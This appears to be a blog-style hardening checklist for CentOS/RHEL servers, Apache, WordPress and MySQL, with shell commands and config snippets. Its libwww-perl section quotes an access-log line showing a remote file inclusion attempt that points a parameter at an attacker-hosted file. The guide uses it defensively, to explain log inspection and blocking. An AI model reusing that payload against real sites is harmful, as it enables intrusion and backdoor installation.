Less is better. Minimize the operating system with only necessary services and packages. You should remove the unwanted services and packages. For example, If you are running a Web Server, then you might want to disable Telnet, NetBIOS, NIS, FTP, NFS, autofs, Bluetooth, Cups (i do not think, you need a printing service on a server), NTP (if your application is not time sensitive), Bind (you do not run a DNS server right?), ypbind (if you do not bind to NIS server) etc...To know what services are started during the system boot, run the below command, to see all running services.
$chkconfig --list | grep '3:on'
Then to stop service, run
$service acpid stop
To prevent the service from starting at the boot
$chkconfig acpid off
Create only necessary user accounts and set passwords to meet the secure password guidelines. If you are sure there will not be any more user accounts creation, then follow : How to stop creating new users ?
Avoid common user names; for instance, apache, mysql, postgres etc…Most of the attackers, try to search for these common user accounts on a server. Well, those are the user accounts created by the services, but sometimes the user accounts having names such as ‘henry’, ‘sam’, ‘root’, ‘admin’, ‘bob’ etc…are more vulnerable to brute-force attacks. Most importantly, never create user accounts in the name of your website or service.
Enforce password change to every user account by setting password expiry policy. I know, this is not the most convincing policy (in user point of view), but you are left with no choice. According to the study, 20% of the internet accounts have passwords as ’123456′. Be careful while choosing your passwords. Set password expiry for users!
In distros like RHEL, fedora, CentOS during installation itself, you would be asked to create the default root account. The default ssh configuration allows all users to login to your server remotely. Learn how to disable the root account!
Most installations will include the firewall functionality. If you need to manually install it, the following commands will install the IP4 and IP6 firewall functionality. In this article we will only consider the IP4 settings.
# yum install iptables # yum install iptables-ipv6
Make sure the service is started and will auto-start on reboot.
# service iptables start # chkconfig --level 345 iptables on
You can check the current status of the service using the following command.
# service iptables status
To disable the firewall, run the following commands.
# service iptables stop # chkconfig iptables off
Logwatch is the classic log file email utility that emails a daily status of activity from Linux logs. On CentOS, the default install of logwatch does not have many fancy features enabled. Learn how to Install LogWatch and configure to receive daily email reports
Generally, ping request generates Internet Control Message Protocol (ICMP) packets. ICMP is one of the protocol from Internet Protocol suite, which is used by network elements such as routers to send error messages to indicate that the requested service or host is not reachable. So it means disabling the ICMP packets to your machine, should deny the ping requests.Learn How to disable or drop Ping (ICMP) packets to your server?
Whatever might be the reason, upgrading your system to the latest Kernel should hold the high priority in your system maintenance check list. So read An Ultimate Guide to Upgrade Kernel on CentOS/RHEL/Fedora
You can update all your packages using the command below
yum update
You might also like to know about configuring YUM and its usage examples.
Allow SSH access to your server from only valid domains or hosts. To do that, you can configure hosts.allow with trusted domains as shown below,
ALL: 14.129.*.*, 202.83.*.*, 203.200.*.* : allow
You can also choose to allow only specific user accounts to login from a remote host. To do that, follow this tutorial : How to allow or deny remote login to specific user accounts on Linux server
The main benefit of a chroot jail is that the jail will limit the portion of the file system the daemon can see to the root directory of the jail. Additionally, since the jail only needs to support Apache, the programs available in the jail can be extremely limited. Most importantly, there is no need for setuid-root programs, which can be used to gain root access and break out of the jail. Learn - Apache in a chroot jail
One of the most important security setting in Apache is, Disabling Directory listing. To do that, set Options directive to None or -Indexes.
<Directory/> Options None Order allow,deny Allow from all </Directory > (or) <Directory/> Options -Indexes Order allow,deny Allow from all </Directory>
To make your WordPress more secure, you can add an extra layer of security to the wp-admin folder so that even authorized users can’t just get in with their WordPress password Know How?
Have you installed PHPMyAdmin? If yes, have you secured it properly? If not, read Know how?
To check whether your website has libwww-perl enabled, run the below command
$ grep ‘libwww-perl’ access_log
Do you see something like below in the output?
190.85.10.147 www.domain.com - [21/Aug/2013:21:22:38 +0000] "GET /webdir/yesno.phtml?no_url=//www.hackersite.com/list1.txt? HTTP/1.1" 200 72672 "-" "libwww-perl/5.76"
It means, some hacker is trying to use the security hole and install a backdoor pages. So libwww-perl useragent have to be blocked to prevent any such attacks on your website. How block it?
To make your WordPress more secure, you can add an extra layer of security to the wp-admin folder so that even authorized users can’t just get in with their WordPress password Know How?
Recently, a security firm reported that more than ninety thousand wordpress sites has been attacked using Brute force method. If you are someone who wants to secure your blog, then check out How to change the default ‘admin’ username of your WordPress Blog?
Here is the list of WordPress Most Popular Security Plugins as an Infographic?
What should you do, if one of your author leaves the job with tons of posts written? Or if someone is trying to Login to WordPress using Brute force method?Know How?
Do a quick check of your WordPress source code. Right click on your WordPress article page and click view source. If you carefully see HTML source code, you will notice that few JavaScripts and stylesheets are taking query string arguments. These query strings mostly denote the version of your WordPress or plugin that you are using. Here’s an example of one such javascript and stylesheet.
//websitename.com/somejavascript.js?ver=3.4.2 //websitename.com/somestyle.css?ver=3.4.2
Know How to remove version information?
WordPress Security Keys will make your website tough to hack. These security keys were introduced in WordPress version 2.6. The security keys are randomly generated variables that encrypts the information stored in user’s cookie. For instance, the passwords like “wordpress” or “test123″ are simple and can be easily broken. Know what WordPress Security Keys are and why you should add them in wp-config.php?
If you were wondering how to remove unnecessary meta tags added to HTML source code of your wordpress site, then here’s how you can do that. Moreover, wordpress meta tag can let others know the version of CMS that you are currently running and you know hackers love such information. Know How?
Whitelist the valid domains or hosts that you wish to connect to database and GRANT necessary privileges. In case of MySQL, execute the below query as admin user.
GRANT ALL PRIVILEGES ON database.* TO 'username'@'trusted_domainname' IDENTIFIED BY 'securepassword';
Be updated of all security news now! Just click on me and enter your e-mail id!